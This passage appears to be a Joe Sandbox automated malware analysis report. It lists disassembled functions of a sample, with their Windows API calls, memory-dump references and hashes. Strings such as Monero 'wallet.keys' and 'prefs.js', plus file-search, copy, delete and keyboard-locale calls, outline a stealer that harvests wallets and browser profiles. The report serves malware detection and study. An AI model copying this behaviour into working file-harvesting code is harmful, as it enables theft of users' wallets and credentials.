                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: beda0f18d65cb1e32b59fa564ac9f42b267cc4af551ee1e4967ca3d0caed0b74
                        • Instruction ID: 962f6553e67c005a02c12f3fba99bfd70e167750a9f78a8df80741ef10e0b9e4
                        • Opcode Fuzzy Hash: beda0f18d65cb1e32b59fa564ac9f42b267cc4af551ee1e4967ca3d0caed0b74
                        • Instruction Fuzzy Hash: 8C6176B5500218AFDB24EFA1DC89EEA737CBB48301F044599F50DA6040EB759BC9CFA5
                        Function 00C54570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C54580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C54587
                        • wsprintfA.USER32 ref: 00C545A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 00C545BD
                        • StrCmpCA.SHLWAPI(?,00C60FC4), ref: 00C545EB
                        • StrCmpCA.SHLWAPI(?,00C60FC8), ref: 00C54601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5468B
                        • FindClose.KERNEL32(000000FF), ref: 00C546A0
                        • lstrcat.KERNEL32(?,008A0710), ref: 00C546C5
                        • lstrcat.KERNEL32(?,0089FAE8), ref: 00C546D8
                        • lstrlen.KERNEL32(?), ref: 00C546E5
                        • lstrlen.KERNEL32(?), ref: 00C546F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 9b48cc41c2e32ad73dd66c68af6179f8e4c77c838cda91402a6698b9faa1db10
                        • Instruction ID: f3977e73789979b9eb7b0eeb3e114d4ec0458a459e2a007bf6d95c087b4907ca
                        • Opcode Fuzzy Hash: 9b48cc41c2e32ad73dd66c68af6179f8e4c77c838cda91402a6698b9faa1db10
                        • Instruction Fuzzy Hash: E05185B55002189FD724EBB0DC89FEE737CAB58301F444599B60DA2090EB749BCC8FA6
                        Function 00C53EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00C53EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00C53EDA
                        • StrCmpCA.SHLWAPI(?,00C60FAC), ref: 00C53F08
                        • StrCmpCA.SHLWAPI(?,00C60FB0), ref: 00C53F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5406C
                        • FindClose.KERNEL32(000000FF), ref: 00C54081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: f35c997b768987f9e4d0e15c9ec1108da79ed8e51114c540d661d54dd9e4c890
                        • Instruction ID: fa03bac1e0d19658a42a64116f730e151793fa68289dfd126bc14bd90dca4455
                        • Opcode Fuzzy Hash: f35c997b768987f9e4d0e15c9ec1108da79ed8e51114c540d661d54dd9e4c890
                        • Instruction Fuzzy Hash: 9F5187B6900218AFCB24EBB1DC86EFA737CBB44301F044599B65DA2040EB759BCD8F65
                        Function 00C4ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00C4ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 00C4ED55
                        • StrCmpCA.SHLWAPI(?,00C61538), ref: 00C4EDAB
                        • StrCmpCA.SHLWAPI(?,00C6153C), ref: 00C4EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4F2AE
                        • FindClose.KERNEL32(000000FF), ref: 00C4F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 52640f104f082e27df0b8d34e4a83ffa9b6dd303dd2d7f6b28cf435d4f4f89ac
                        • Instruction ID: bfd0669abb13f40b570535b2cc5c4f3599be9b6d227316cffd0ba9a04d081311
                        • Opcode Fuzzy Hash: 52640f104f082e27df0b8d34e4a83ffa9b6dd303dd2d7f6b28cf435d4f4f89ac
                        • Instruction Fuzzy Hash: ADE1F5759111189AEB54FB62CC92EEE7338BF54301F4442A9B90A62092EF306FCEDF55
                        Function 00C4F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C615B8,00C60D96), ref: 00C4F71E
                        • StrCmpCA.SHLWAPI(?,00C615BC), ref: 00C4F76F
                        • StrCmpCA.SHLWAPI(?,00C615C0), ref: 00C4F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4FAB1
                        • FindClose.KERNEL32(000000FF), ref: 00C4FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 70665d61447e91276916df33c1594f4a4cf20021662f0320306a74525eec0815
                        • Instruction ID: 169ae72c4387ed430f6fecf498d80c7a9a88bb742d752489fcd036c8c0102511
                        • Opcode Fuzzy Hash: 70665d61447e91276916df33c1594f4a4cf20021662f0320306a74525eec0815
                        • Instruction Fuzzy Hash: A4B163759001189BDB24FF61DC95BEE7378BF54301F4082A9E80A96181EF306B8EDF96
                        Function 00C416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C6510C,?,?,?,00C651B4,?,?,00000000,?,00000000), ref: 00C41923
                        • StrCmpCA.SHLWAPI(?,00C6525C), ref: 00C41973
                        • StrCmpCA.SHLWAPI(?,00C65304), ref: 00C41989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C41D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00C41DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C41E20
                        • FindClose.KERNEL32(000000FF), ref: 00C41E32
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 070707b981c1b4d1a07fc9995994c0baa3a04695f29645f8170002953afc82a7
                        • Instruction ID: 06d323c4421427a605d658eb60cfc64e760aa4fceb1e4a85b64c5db75efcd5b5
                        • Opcode Fuzzy Hash: 070707b981c1b4d1a07fc9995994c0baa3a04695f29645f8170002953afc82a7
                        • Instruction Fuzzy Hash: 7A12EE759101189BDB25FB62CC96AEE7378BF54301F4042A9B90A62091EF306FCDDFA5
                        Function 00C4DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C60C2E), ref: 00C4DE5E
                        • StrCmpCA.SHLWAPI(?,00C614C8), ref: 00C4DEAE
                        • StrCmpCA.SHLWAPI(?,00C614CC), ref: 00C4DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4E3E0
                        • FindClose.KERNEL32(000000FF), ref: 00C4E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: b432059858c1dd255c97bb1f1cac63c81e07ad11b8b0de6e5d9230aaacd392d3
                        • Instruction ID: 919200f600704f33dede4ac2783a45f8b79a8b83ecc4387aa70fbf1638db3254
                        • Opcode Fuzzy Hash: b432059858c1dd255c97bb1f1cac63c81e07ad11b8b0de6e5d9230aaacd392d3
                        • Instruction Fuzzy Hash: C9F19F758141189ADB25FB62DC95EEE7338BF14301F8442E9A81A62091EF306FCEDF56
                        Function 00C4DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C614B0,00C60C2A), ref: 00C4DAEB
                        • StrCmpCA.SHLWAPI(?,00C614B4), ref: 00C4DB33
                        • StrCmpCA.SHLWAPI(?,00C614B8), ref: 00C4DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4DDCC
                        • FindClose.KERNEL32(000000FF), ref: 00C4DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 3adf15aa9f35151e60dbbe8ab92e876f793f32f0dd7b99c6ebb99a728b88045f
                        • Instruction ID: ce507c0fd43272cfa2215828a6e3db2a38542a76fad21c038d7cfc6d3e22ae6d
                        • Opcode Fuzzy Hash: 3adf15aa9f35151e60dbbe8ab92e876f793f32f0dd7b99c6ebb99a728b88045f
                        • Instruction Fuzzy Hash: 289185769001049BCB14FB71EC96AED773CBB88301F448669FD0A96181EE349B4DDBA6
                        Function 00C57B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,00C605AF), ref: 00C57BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00C57BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C57C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C57C62
                        • LocalFree.KERNEL32(00000000), ref: 00C57D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: bfd25b7b28e461e7f971b66be3f4515e6568333d23fdbdcc8f7f95199b88a153
                        • Instruction ID: 58c0082e0810cb5e26e3bc47ea68eea8c77c9dee5c1241ed9a7162d5408935e8
                        • Opcode Fuzzy Hash: bfd25b7b28e461e7f971b66be3f4515e6568333d23fdbdcc8f7f95199b88a153
                        • Instruction Fuzzy Hash: 7C416D75940218ABDB24DB95DC89BEEB378FF44701F2042D9E80A62180DB342FC9DFA5
                        Function 0100A6BF Relevance: 10.4, Strings: 7, Instructions: 1600COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
